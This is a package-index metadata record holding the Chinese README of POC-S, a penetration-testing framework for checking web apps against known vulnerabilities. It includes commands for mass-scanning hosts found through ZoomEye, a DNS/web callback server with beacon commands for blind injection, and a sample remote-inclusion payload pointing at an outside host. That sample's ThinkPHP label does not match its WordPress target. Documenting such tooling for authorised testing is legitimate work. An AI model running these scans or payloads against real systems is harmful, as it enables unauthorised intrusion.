{"id":13843642,"url":"https://github.com/jiangsir404/POC-S","last_synced_at":"2025-07-11T19:32:47.133Z","repository":{"id":47372295,"uuid":"237251091","full_name":"jiangsir404/POC-S","owner":"jiangsir404","description":"POC-T强化版本 POC-S , 用于红蓝对抗中快速验证Web应用漏洞， 对功能进行强化以及脚本进行分类添加，自带dnslog等, 平台补充来自vulhub靶机及其他开源项目的高可用POC","archived":false,"fork":false,"pushed_at":"2020-03-12T02:49:38.000Z","size":3570,"stargazers_count":358,"open_issues_count":2,"forks_count":65,"subscribers_count":11,"default_branch":"master","last_synced_at":"2024-11-04T21:47:22.992Z","etag":null,"topics":["cnvd-2020-10487","dnslog","pentest-scripts","poc","poc-t","pocs","pocsuite","tomcat-ajp-lfi"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jiangsir404.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.txt","contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-01-30T16:09:39.000Z","updated_at":"2024-10-26T09:13:01.000Z","dependencies_parsed_at":"2022-08-12T13:22:11.783Z","dependency_job_id":null,"html_url":"https://github.com/jiangsir404/POC-S","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jiangsir404%2FPOC-S","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jiangsir404%2FPOC-S/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jiangsir404%2FPOC-S/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jiangsir404%2FPOC-S/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jiangsir404","download_url":"https://codeload.github.com/jiangsir404/POC-S/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225755070,"owners_count":17519195,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cnvd-2020-10487","dnslog","pentest-scripts","poc","poc-t","pocs","pocsuite","tomcat-ajp-lfi"],"created_at":"2024-08-04T17:02:21.646Z","updated_at":"2024-11-21T15:31:17.941Z","avatar_url":"https://github.com/jiangsir404.png","language":"Python","readme":"# POC-S: *POC-T Strengthen Version POC-T加强版* \n\nPOC-T的wiki文档请看doc目录\n\n前言: 目前\n\n## 法律免责声明\n未经事先双方同意，使用POC-S攻击目标是非法的。\nPOC-S仅用于安全测试目的\n\n## 特点\n- 兼容POC-T的语法\n- 良好的poc分类，灵活的poc加载方式，支持单文件，批量，任意目录的加载方式\n- 提供pocs/poc-s终端命令，让框架和poc分离，可以将自定义的poc放在任意目录\n- 提供简易的dns平台，只需要一个域名一个公网ip即可运行, 可用于快速验证命令盲注和sql盲注，简单高效。\n- 提供良好的单元测试脚本\n\nTODO\n- [x] 根据vulhub靶机及开源项目收集和完善POC, 具体可以看我的POC分类\n- [x] 提供--init参数动态更新tookit.conf配置文件,eg: --init zoomeye, 初始化zoomeye的配置信息\n- [x] 添加dnslog, weblog平台用于快速验证漏洞\n- [x] 添加ceye.py和dnslog.py 两种验证插件\n- [ ] 添加pocsapi.py, 类似sqlmapapi的功能\n- [ ] 增加py3版本的POC-S\n\n## 使用 \n\u003e 由于第三方接口需要认证，可以通过--init参数来初始化你的相关接口配置，eg: --init zoomeye\n\n\tpip install pocs\n\n源码安装: \n\n```\ngit clone https://github.com/jiangsir404/POC-S.git\nmv pocs/toolkit.conf.bak mv pocs/toolkit.conf\npython setup.py install\n```\n\n\u003e 如果pip按照pcos出现Some files missing的报错，则需要去到pocs的安装目录(python2.7\\Lib\\site-packages\\pocs)重命名tookit.conf.\n\u003e 如果出现`WARNING: Generating metadata for package cachetools produced metadata for project name unknown. Fix your #egg=cachetools fragments.`报错，则是包依赖的问题\n\u003e 请检测并更新几个包的版本的问题: setuptools==39.0.1 cachetools==3.1.1 google-api-python-client==1.7.11\n\n1. 更加灵活的插件加载方式\n\n```\npocs -s test/test2.py -iS 127.0.0.1 #加载script/test/test2.py脚本\npocs -s test2 -iS 127.0.0.1 # 加载script/test2.py脚本\n\npocs -b test -iS 127.0.0.1 # 批量加载/script/test目录下的所有脚本\npocs -b test -s test2.py -iS 127.0.0.1 #加载script/test/test2.py脚本\n\npocs -s myself_script.py -iS 127.0.0.1 # 加载自定义的脚本和脚本目录\npocs -b mydir -iS 127.0.0.1\n```\n\n2. 搜索引擎的利用\n```\npocs --init zoomeye //初始化zoomeye的配置信息\npocs -b redis -t 50 -aZ \"port:6379\" --limit 50 -o res.txt\npocs -s test2.py -aZ \"ThinkPHP\"\n```\n\n利用ZoomEye批量搜索CNVD-2020-10487 tomcat ajp lfi漏洞\n\n\tpip install pocs\n\tpocs -b apache -aZ \"app:tomcat\" --limit 50 -t 30 -o ajp.txt\n\n![](test.png)\n\n3. dnslog平台使用\n\n如果你还在纠结于ceye的不稳定，没有时间精力搭建DNSLog平台(需要两个域名，一个公网ip, 且域名还需要能够修改dns服务器)\n那么不妨试一试POC-S提供的简易dnslog平台，只需要一个域名和一个公网ip即可搭建，提供api接口进行验证(无界面)\n\n假设dnslog.xxx.cn是你的公网域名，x.x.x.x是公网ip，请确保dnslog.xxx.cn可以正常解析到x.x.x.x, 否则无法正常访问api\n在公网(x.x.x.x)运行命令: \n```\npip install pocs\npocs_dnslog -h 0.0.0.0 -p 88(如果不是pip安装的可以直接运行pocs.dnslog.py脚本)\n\u003e\u003e\u003e dns domain: dnslog.xxx.cn\n\u003e\u003e\u003e api key: rivir\n\u003e\u003e\u003edns ip: x.x.x.x\n```\n\ndns log命令，只支持nslookup命令: `nslookup 1234.dnslog.xxx.cn x.x.x.x`  \n\u003e 如果你想用ping 1234.dnslog.xxx.cn命令，也可以给xxx.cn域名配置自定义的域名服务器(参考DNSLog的配置)\n\nweb log命令: `curl http://dnslog.xxx.cn:88/weblog/poc123`\n\napi接口地址: `http://x.x.x.x:88/api/?token={token}\u0026type={dns}\u0026filter=1234.dnslog.xxx.cn`\n参数:\n    - token 必填, 搭建dnslog时输入的api_key\n    - type 必填，可选值有dns/web\n    - filter 选填，过滤出记录，完全匹配\n## POC\npocs 提供更加灵活的插件分类方式，目前收集到的总结有四类POC: Fuzz POC, OWASP POC, Vuln POC, Tool POC.  POC这块会尽量收集一些github上面已有的POC, 但不会太多，还是需要个人自己去收集整理。f  \n\nPOC编写会尽可能规范，遵循POC-T的编写风格。eg如下\n```\n#!/usr/bin/env python\t\t\n#coding:utf-8\n\n\"\"\"\nThinkPHP5 \u003c=5.0.22/\u003c=5.1.29 远程代码执行漏洞\n\nDesc\n    2018年12月10日中午，thinkphp官方公众号发布了一个更新通知，包含了一个5.x系列所有版本存在被getshell的高风险漏洞。\n    由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，\n    受影响的版本包括5.0.23和5.1.31之前的所有版本，推荐尽快更新到最新版本。\nVersion\n\tThinkPHP5.0 版本 \u003c= 5.0.22 ThinkPHP5.1 版本 \u003c= 5.1.29\nUsage:\n\t1. python POC-S.py -s \n\t2. POC: /wp-admin/admin-post.php?swp_debug=load_options\u0026swp_url=http://lj.s7star.cn/info.txt\nReferer\n\thttps://www.seebug.org/vuldb/ssvid-9771\n\"\"\"\n\nimport requests\n\ndef poc(url):\n    pass\n```\n\n### Vuln POC\n主要来源于vulhub的插件编写 以及 POC-T自带的插件poc, 只添加一些高可用的POC\n下面列出的每个POC基本都是自己搭建环境一个一个验证过可用的，如果有错误的POC, 请提issues联系我。\n\n- [x] struts2\n    - [x] s2-005.py\n    - [x] s2-015.py\n    - [x] s2-016.py\n    - [x] s2-032.py\n    - [x] s2-045.py\n    - [x] s2-052.py\n    - [x] s2-053.py\n    - [x] s2-057.py\n    - [x] struts2-devmode.py    \n- [x] weblogic\n\t- [x] weblogic-ssrf-netmap.py  cve-2014-4210\n\t- [x] weblogc-cve-2017-10271.py (CVE-2017-10271)\n\t- [x] weblogic-cve-2018-2628.py \n\t- [x] weblogic-cve-2019-2725.py\n\t- [x] weblogic-cve-2019-2729.py\n\t- [x] weblogic-cve-2020-2551.py\n\t- [ ] weblogic-upload-getshell.py (CVE-2018-2894)\n- [x] thinkphp\n\t- [x] 5-rce\n\t- [x] 5.0.23-rce\n- [ ] Jenkins\n    - [ ] jenkins-cve-2015-8103.py\n    - [x] jenkins-cve-2017-1000353.py\n    - [ ] jenkins-cve-2018-1000861.py\n- [ ] weakpass\n\t- [ ] mysql\n\t- [ ] redis\n\t- [ ] mongo\n\t- [ ] sqlserver\n\t- [ ] ftp\n\t- [ ] telent\n\t- [ ] web弱口令(通用无验证码后台)\n\t- [ ] http-basic-auth\n\t- [ ] coremail\n\t- [ ] jboss\n\t- [ ] jenkins\n\t- [ ] weblogic\n- [ ] unauth\n\t- [x] redis-unauth.py\n\t- [x] mongodb-unauth.py\n\t- [x] memcached-unauth.py\n\t- [x] elasticsearch-unauth.py\n\t- [x] kubernetes-unauth.py\n\t- [x] jenkins-unauth.py\n\t- [ ] docker-unauth-rce.py\n\t- [ ] hadoop-unauth.py\n- [x] apache\n\t- [x] CNVD-2020-10487 tomcat-ajp-lfi.py\n\t- [ ] tomcat-upload.py\n    - [ ] tomcat-weak-pass.py\n- [x] Citrix\n    - [ ] cve-2019-19781\n- [x] supervisor\n\t- [x] supervisord-RCE-CVE-2017-11610.py\n- [ ] Jboss\n    - [x] jboss-rce.py\n    - [ ] CVE-2017-12149\n    - [ ] CVE-2013-4810\n- [x] spring\n    - [x] spring-oauth2-rce.py\n    - [ ] cve-2018-1273\n- [ ] phpmyadmin\n\t- [x] phpmyadmin-auth-rce.py\n\t- [ ] phpmyadmin4.8.1-RFI.py\n- [ ] kibana\n\t- cve-2019-7609\n\t- cve-2018-17246\n- [ ] php\n\t- [x] fpm-rce.py\n\t- [ ] CVE-2019-11043\n\t- [ ] CVE-2018-19518\n- [ ] discuz\n\t- [ ] x3.4-arbitrary-file-deletion\n- [ ] zabbix\n\t- [x] zabbix-jsrpc-mysql-exp.py\n\t- [x] zabbix-jsrpc-sqli.py\n\t- [x] zabbix-weakpass.py\n\t- [x] zabbix_latest_sqli.py\n- [x] dns-zone-transfer\n- [ ] confluence\n\t- [x] confulence-traversal.py\n\t- [ ] confluence 路径穿越与命令执行漏洞\n\n\n### Fuzz POC\n来源: boy-hack/POC-T\n\n- bakfile: 备份文件检测\n- crossdomain: crossdomain\n- dzxss \n- gitleak\n- issparse\n- ms15-034\n- phpinfo\n- phpmyadmin\n- svnleak\n- swf\n- tomcat_xmlleak\n- wordspace\n\n### OWASP POC\n来源hunter的检测脚本\n\n- [ ] cmd_exec\n- [ ] sql_injection\n- [ ] xss\n- [ ] xxe\n- [ ] csrf\n- [ ] jsonp_xss\n- [ ] jsonp_hijacking\n- [ ] file_read\n- [ ] ssti\n- [ ] ssrf\n\n\n### Tool Poc\n一些常见的工具类POC, 提供搜索引擎，信息查询等功能\n\n- bing-dork bing 搜索\n- bingc 基于Bing搜索引擎的 IP反查域名, C段域名\n- google-dork google搜索\n- cdn-detect cdn检测\n- waf 检测waf 并返回没有waf的url\n- craw 爬取链接中的相关地址\n- vulscan 检测sql注入漏洞\n- portscan 端口扫描，检测弱口令服务\n- [ ] domain2ip 域名查询ip\n- [ ] whois 查询whois信息\n- [ ] icp icp查询\n\n\n其他开源的POC比如https://github.com/boy-hack/airbug 项目收集了一些poc可以直接使用，但有一个HackReqeust库是py3的，需要改一下成Python2的， 可以直接安装我改过后的py2库:https://github.com/jiangsir404/hack-requests \n\n","funding_links":[],"categories":["Python","Python (1887)"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjiangsir404%2FPOC-S","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjiangsir404%2FPOC-S","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjiangsir404%2FPOC-S/lists"}